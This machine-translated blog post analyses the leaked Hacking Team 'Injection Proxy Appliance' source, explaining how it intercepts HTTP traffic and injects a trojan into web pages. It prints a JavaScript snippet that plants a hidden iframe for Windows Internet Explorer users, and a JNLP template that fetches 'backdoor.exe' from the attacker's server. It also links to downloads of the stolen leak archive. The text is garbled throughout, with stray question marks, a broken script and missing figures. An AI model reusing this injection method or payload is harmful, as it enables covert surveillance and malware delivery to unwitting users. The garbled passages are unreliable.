Man-in-the-middle attack html Injection
0 × 00 orders
The article I wrote a long time ago is now shared. I declare in advance that I am a cool dish, so the analysis of leaked data will inevitably be negligent or wrong. I hope you will be more careful.
On the evening of July 5 this year, an Italian software vendor was attacked. The 387.05GB Vulnerability (including 0-day vulnerabilities) leaked data, which caused a storm in the industry. Because the total size of all files is 387.05 GB, it takes a long time to download the files. Here I provide a full version of Baidu network disk, interested students can directly download: http://yun.baidu.com/s/1jG8fOxS. It is said that this is because there are many emails. But you don't have to worry about your small pipe. Some good guys sorted out an excellent version with only 1.3G. Here I also provide a Baidu Network Disk: http://yun.baidu.com/s/1eQDFm18. Before downloading the full version, let's use the essence version to solve the problem.
0 × 01 Preface
The IPA here is not the abbreviation of the Apple application file iPhoneApplication, but the abbreviation of Injection Proxy Appliance. Injection Proxy Appliance is part of Galileo Remote Control System (Galileo Remote Control System, its main role is:
IPA is a security device used by the Hacking Team RCS system to attack. It uses the man-in-the-middle attack technology and the streamline injection mechanism to operate transparently on different networks, whether on a LAN or an internal switch. IPA can also detect HTTP connections from monitored network traffic and conduct man-in-the-middle attacks on them. There are three main attack methods: HTML injection, EXE injection, and replacement attacks. When the monitored HTTP connection hits the preset rule, IPA executes the injection attack. IPA can set rules for users (such as IP addresses) and resources (such as executable files) to be injected.
The source code of its vector-ipa is in the Hacked Team \ rcs-dev \ share \ HOME \ Fabio \ archive \ projects \ pc \ RCSRedirect folder ??, Its content 1. ??
?
?? Figure 1 content of vector-ipa ???
?
The source code shows that this is the C code used to compile and connect the entire project using the Makefile file in the Linux environment, and the openssl library is also used.
0 × 02 attack principles
The process of client and server information exchange based on HTTP/1.0 protocol includes four steps:
(1) Establish a connection; (2) Send requests; (3) Send Response Information; (4) Close the connection.
IPA detects HTTP connections in the network traffic monitored in proxy mode, hijacks the HTTP Header of the Http connection, and modifies the Http Header content to launch an attack. The attack process is 2.
Figure 2 process of http injection by IPA
As shown in figure 2, the main two steps of the attack are:Modify HTTP Request HeaderAndWrite the Trojan into the HTTP Reply Header. The following describes the two steps.
0 × 03 HTTP Request Header
1. Reduce the HTTP protocol from 1.1 to 1.0 to avoid block encoding and other problems
First, one of the differences between HTTP/1.0 and HTTP/1.1 is:
(1) HTTP 1.0 requires that the browser and the server only maintain a short connection. Each request of the browser must establish a TCP connection with the server. After the server completes request processing, the TCP connection is immediately disconnected, the server does not track each customer or record past requests. 3.
Figure 3 connecting HTTP/1.0
(2) HTTP 1.1 supports persistent connections. Multiple HTTP requests and responses can be sent over a TCP connection, reducing the consumption and delay of establishing and disabling connections. Multiple requests and responses to a webpage file containing many images can be transmitted in one connection, but each individual webpage file's request and response still need to use their own connection. 4.
Figure 4 connecting HTTP/1.1
Http injection does not require persistent connections, so we need to change it to HTTP/1.0. In this way, block encoding and other problems can be avoided.
2. Use pure encoding to avoid compression of any type.
In the HTTP Header, the Accept-Encoding is sent from the browser to the server, declaring the Encoding type supported by the browser.
Common examples include:
Accept-Encoding: compress, gzip // supports compress and gzip-type Accept-Encoding: // The default value is identityAccept-Encoding: * // supports all types of Accept-Encoding: compress; q = 0.5, gzip; q = 1.0 // supports gzip, compressAccept-Encoding: gzip; q = 1.0, identity; q = 0.5 ,*; q = 0 // supports gzip and identity in sequence
?? To better modify the HTTP Reply Header later, you need ????Accept-EncodingSetNoneTo avoid any type of compression, as shown in source code 5 .??
Figure 5 set Accept-Encoding to none
3. Do not use cache (avoid the server from returning 304 responses)
If you do not use the Cache, You need to delete the If-Modified-Since and If-None-Match in the Cache header field to better obtain new files, as shown in 6.
Figure 6 Delete If-Modified-Since and If-None-Match in the Cache Header
If-Modified-Since
The last modification time of the client-side cache page is sent to the server. The server compares this time with the last modification time of the actual file on the server. If the time is the same, 304 is returned, and the client directly uses the local cache file. If the time is different, 200 and the new file content are returned. The client discards the old file, caches the new file, and displays it in the browser. 7.
?? Figure 7 If-Modified-Since ??
If-None-Match
If-None-Match and ETag work together. The working principle is to add ETag information in HTTP Response. When the user requests the resource again, the If-None-Match information (ETag value) will be added to the HTTP Request ). If the ETag of the server authentication resource is not changed (the resource is not updated), a 304 status will be returned to tell the client to use the local cache file. Otherwise, the system returns the 200 status and the new resource and Etag. 8.
Figure 8 If-None-Match
4. Close and keep the connection
We all know the differences between Connection: keep-alive and Connection: close:
Connection: keep-alive
After a webpage is opened, the TCP connection used to transmit HTTP data between the client and the server is not closed. If the client accesses the webpage on the server again, will continue to use this established connection.
Connection: close
After a Request is completed, the TCP connection used to transmit HTTP data between the client and the server is closed. When the client sends the Request again, a TCP connection needs to be established again.
Previously, we reduced the HTTP protocol from 1.1 to 1.0. For the sake that Connection: keep-alive may exist in the HTTP Request Header, a problem occurs when the HTTP Reply Header is modified later.
In this way, the HTTP Request Header is modified, and the Request is sent to the server ~
0 × 04 Trojan Files
Previously, we sent the modified HTTP Request Header to the server, and the service also returned the HTTP Reply Header response. The next step is also the most critical step, namely writing the Trojan into the HTTP Reply Header.
1. Read Trojan file content
Before that, we need to prepare the trojan file for detection. If it does not exist, a new BIO is returned.
Figure 9 Trojan file preparation Detection
The preceding Trojan file preparation check shows that the trojan file 10 is displayed.
Figure 10 Trojan Files
The injection principle is in the HTTP Reply Header
Inject a JavaScript script into the tag. The content of its JavaScript script is as follows:
<script language="javascript" type="text/javascript"> if (navigator.platform == "Win32") { if (navigator.appName == "Microsoft Internet Explorer") { document.write("<iframe src =\"\" width=\"0\" height=\"0\"></iframe>
"); } else { document.write("
"); } }</script>
?? From the JavaScript script, we found that the script jumps to a file named JwsUpdater. jnlp. What is JNLP first ???
JNLP (Java Network Launching Protocol) is a java-provided way to directly execute java applications through a browser, it allows you to directly open a java application through a url Connection on a web page. Java Desktop applications are released in the form of JNLP. If you do not need to release a version to all users after the version upgrade, you only need to update the server version, this is equivalent to giving java applications the advantages of web applications.
?? The jnlp file is used to open a URL Connection on a webpage through a browser to execute the java Trojan application .??
%SITE_HOSTNAME%
%IPA_URL%/backdoor.exe
?? In The. jar file is downloaded to the local device. If you set parameters in application-desc, the com. sun. JwsInstaller. Unzip supdater class in the jar file will be executed in a safe way to automatically load backdoors on the server .??
?? If the detection passes, the trojan file contents supdater.html are read to html_to_inject.
2. Modify IPA_URL
Either the supdater.html file or the supdater. jnlp file contains "% IPA_URL % ". I need to change "% IPA_URL %" to the address of the work server.
3. Set search keywords and injection Buffer
If the trojan script and server website are modified, everything is ready. Right. Setting search keywords and injection buffers are just a breeze.
First, let's look at a struct:
struct bio_inject_setup { char *search; char *inject; size_t inject_len;};
There are three members: search Keyword, inject, and inject_len ).
As mentioned above, our Trojan content is a JavaScript script, so the injection of the Trojan script is in the html file.
Label.
0 × 05 HTTP Reply Header
If all the trojan files are ready, write the trojan file to the HTTP Reply Header. Perform the following three steps:
1. Write the Trojan into the HTTP Reply Header
Previously, we set search keywords and injection buffers.
Search for the keyword in the HTTP Reply Header, and then write the content of the injection buffer to the HTTP Reply Header. 11:
??
Figure 11 Write a Trojan into the HTTP Reply Header
2. Check whether the HTTP Reply Header is gzip compressed.
The HTTP Reply Header must be pure encoded and cannot be compressed. Therefore, if the HTTP Reply Header is compressed, the attack will be stopped.
3. Adjust the Content-Length attribute of the HTTP Reply Header
Previously, the trojan script was injected into the HTTP Reply Header, so the Length of the HTTP Reply Header must have changed. Therefore, we need to adjust the Content-Length attribute of the HTTP Reply Header.
So far, the last step is to send the HTTP Reply Header back to the client. In this way, the trojan program is planted to the client. Next we can use the backdoor program to launch a series of attacks.